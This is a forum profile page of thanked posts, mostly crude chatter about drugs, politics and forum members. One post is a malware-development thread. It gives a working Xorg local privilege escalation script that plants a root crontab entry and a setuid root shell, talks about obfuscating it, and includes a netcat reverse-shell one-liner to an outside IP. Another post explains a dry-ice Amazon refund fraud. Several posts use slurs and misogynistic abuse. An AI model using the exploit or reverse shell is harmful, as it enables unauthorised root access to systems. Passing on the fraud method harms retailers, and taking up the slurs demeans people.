User Controls
Posts That Were Thanked by Cowboy2013
-
2021-07-30 at 3:28 PM UTC in My Glock is my hoe. And my hoe go everywhere I go.Swap that glock for a bicycle with a shopping basket on the front...be a leader not a follower.
The following users say it would be alright if the author of this post didn't die in a fire! -
2021-07-30 at 12:24 PM UTC in I dont get what his point is here guyswhy do you care what this gremlin thinksThe following users say it would be alright if the author of this post didn't die in a fire!
-
2021-07-30 at 9:25 AM UTC in Sydney: Army to enforce lockdownLol, just like the orthodox jedis in April 2019The following users say it would be alright if the author of this post didn't die in a fire!
-
2021-07-30 at 2:56 AM UTC in I genuinely like CandyRein
Originally posted by Chairman Takeshi Kaga Your personality is too weak to pressure candyrein into anything.
SHut up bitch YOU ONLY LIVE ONCE and lets admit you aren't gonna find any good quality stuff round here so this is your only chance to have a clean ride.
Originally posted by Donald Trump Congtats, the man who put it in my hood.
You buy it! You own it!
OTOH it's not like there was anyone in kyiv to tell you "OK, you own such".
There is no one in moscow to yell you "OK, you own such".
How do you respect someone who stands behind you?
Shut up bitch you only live once. Doesn't matter if you are a russian dirt farmer or a chinese bush meat hunter because this is the Molecules of the holy creator a blessing onto humanity and a gift, do not take a drug to get high but take it to appreciate the experience of being alive in a universe where your brain can even process the chemicals and make you feel that way. There is bad with every good but if you trust in God you can get through anything namasteThe following users say it would be alright if the author of this post didn't die in a fire! -
2021-07-30 at 2:47 AM UTC in I genuinely like CandyReinThe following users say it would be alright if the author of this post didn't die in a fire!
-
2021-07-29 at 7:27 AM UTC in I genuinely like CandyReinwho the fuck askedThe following users say it would be alright if the author of this post didn't die in a fire!
-
2021-07-28 at 10:44 AM UTC in The only shitty thing about coke straight from the brick.The following users say it would be alright if the author of this post didn't die in a fire!
-
2021-07-24 at 7:24 AM UTC in Sh/Bash based malware for *Nix.Welcome to another edition of Sophie's Cyber Shenanigans. This thread, i got some unconventional ways to work on *Nix based malware. And a couple questions for the level 97 shell script wizards.
So i am experimenting with shell scripts, to find out what is and isn't viable should i want to create a shell script based malware for loonix. Why shell script? They're easily obfuscated, a bunch of utils have PE/Static binary formats you can bring along, or deploy remotely, and all distros have `Sh` and almost always `Bash` as far as i am aware.
What's more, shell scripts, allow one to invoke commands and operations from any scripting lang that have their interpreter installed on the distro you are targeting 'out of the box' as it. Which tend to be quite a few.
Chances are you'll have access to: Perl, Python, Lua, TclSh, M4(Plus other Macro 'langs') and if you're lucky PHP, Ruby, Node and so on and so forth.
Another benefit of using `Sh` or `Bash` is that you don't have to worry about compatibility issues. Should you want to make use of payloads written in let's say C, you have the opportunity to perform Recon simply with the `uname -svm` command and then you'll have the proper architecture and kernel version. Which is great to know if you want to write an exploit for the system you're on.
Here's an example.
#!/bin/bash
# There are a bunch of vulns in the Xorg server and related utils like
#
# X.Org xorg-x11-xfs - Local Race Condition
# xorg-x11-server - 'inittab Local Privilege Escalation
#
# And much more, we're gonna do the second one as an example
#
# When ##!!## occurs in the script i got some annotations below
#
cat << EOF > /tmp/x_orgasm
cp /bin/sh /usr/local/bin/pwned ##!!##_1
echo "main(){setuid(0);setgid(0);system(\"/bin/sh\");}" > /tmp/pwned.c
gcc /tmp/pwned.c -o /usr/local/bin/pwned ##!!##_2
chmod 4777 /usr/local/bin/pwned
EOF
chmod +x /tmp/x_orgasm
# prepare your anus
cd /etc
Xorg -fp "* * * * * root /tmp/x_orgasm" -logfile crontab :1 & ##!!##_3
sleep 5
pkill Xorg ##!!##_4
sleep 120
ls -l /etc/crontab*
ls -l /usr/local/bin/pwned
# Start elevated Sh
/usr/local/bin/pwned
##!!##_1
Before you say: you can't just copy /bin/sh. Well we don't really need to the line after that builds a Sh shell too.
If you're afraid we won't have permissions for `gcc` here's something that'll do exactly the same with UID 0.
Alternatively we could ship a shell in Asm with the payload up top.
##!!##_2
/tmp and some of the other directories featured here get mounted as NOSUID which is good. Because NOSUID beats root.
/usr/local/bin is part of the $PATH and has MODE 2775/drwxrwsr-x
##!!##_3
The operation here is what triggers the bug. Without getting too much into the weeds killing Xorg at ##!!##_4 with pkill will cause inittab to retart the cronjob related to Xorg that we changed with the operation we ran previously which then starts our 'pwned' Sh with root privileges.
Obfuscation
There's tools to obfuscate bash. Which is great. Here's an example of this same script obfuscated with the methods below.
String/Hex Hash, 1 Iteration
Token/ForCode, 1 Iteration
Find the result here
Or if you prefer a picture check the spoiler out below.
Anyway, i hope you found that informative. However before you go i do actually have a question for the level 97 shell script wizards.
I want to have a function in a shell script that i can call with different commands, so `cmd_func cat /etc/passwd`. My current implementation looks like this:
#!/usr/bin/env -S sh\_"umask\_700"\_-f
# BTW This is legal right ^
#
# I'm U_masking because i am writing stuff out
# Under a specific user account
buff_ops()
{ # I want to run it through a FIFO pipe/buffer in fact it is a requirement.
cmd=$0
arg=$1
mknod u_dev p && cat < `read -t (${cmd $'\0' arg})` 0<u_dev | /bin/bash 1>u_dev
};
buff_ops CMD ARG # <- is what i want
I figured it should be good since stuff like this works also:
rm -f x; mknod x p && nc 192.168.1.10 1337 0<x | /bin/bash 1>x
Thicc threads niggas. One on low level security and dev incoming soon as well.The following users say it would be alright if the author of this post didn't die in a fire! -
2021-07-20 at 1:55 PM UTC in Ways around not getting a fire stick or smart tvKodi is still a thingThe following users say it would be alright if the author of this post didn't die in a fire!
-
2021-07-20 at 1:01 PM UTC in NIS fitness clubI had a 4 day old boiled egg for breakfast.The following users say it would be alright if the author of this post didn't die in a fire!
-
2021-07-20 at 11:46 AM UTC in Dry icing postal fraud (eg Amazon)This is genius - when returning electronics to amazon you put dry ice into a box and send it, making sure to insure it and get proof of postage, including weight. The dry ice evaporates while the box is in transit, so amazon receive an empty box, and assume the item was stolen in transit.
https://sinister.ly/Thread-Amazon-advance-refund--131758The following users say it would be alright if the author of this post didn't die in a fire! -
2021-07-20 at 9:39 AM UTC in Why breaking bad and the wire are the best showsby legal I mean non regulatedThe following users say it would be alright if the author of this post didn't die in a fire!
-
2021-07-20 at 4:49 AM UTC in Yanks shilling for revolution in Cuba makes no senseThe following users say it would be alright if the author of this post didn't die in a fire!
-
2021-07-19 at 11:23 PM UTC in I hate being oldThe following users say it would be alright if the author of this post didn't die in a fire!
-
2021-07-19 at 4:03 PM UTC in Yanks shilling for revolution in Cuba makes no senseI get my news from robotic algorithms that know I am disillusioned with the world and only care about food, video games and local stuff.
The following users say it would be alright if the author of this post didn't die in a fire! -
2021-07-19 at 2:52 PM UTC in Yanks shilling for revolution in Cuba makes no senseCuba is in every way better off than America.
Cubans don't have massive depression, they don't have fentanyl overdoses, they don't have endless wars, they don't have massive homelessness, they don't have healthcare bankruptcies, they don't have BLM.
Americans ought to be shilling for revolution in America instead.The following users say it would be alright if the author of this post didn't die in a fire! -
2021-07-18 at 6:41 PM UTC in Official: CandyRein discussion threadThe following users say it would be alright if the author of this post didn't die in a fire!
-
2021-07-18 at 6:33 PM UTC in Marilyn Manson DiscussionManson rules
We’re all stars now in the dope show
Seen him live with Alice cooper was goodThe following users say it would be alright if the author of this post didn't die in a fire! -
2021-07-18 at 3:33 PM UTC in What are you doing at the momentSHE GONNA SEND U A DIK PIC NOWThe following users say it would be alright if the author of this post didn't die in a fire!
-
2021-07-18 at 11:50 AM UTC in Official: CandyRein discussion thread
Originally posted by BeeReBuddy When Candyrein first came it was the moment she found out I was a white guy.
I made the mistake of advertising the fona-fone and she blew it up.
Back then I was on a pay as you go plan and I paid dearly.
That bitch is not funny. She is not interesting. She is not special.
The only thing she is, is easy.
What a slut.
whoaThe following users say it would be alright if the author of this post didn't die in a fire!
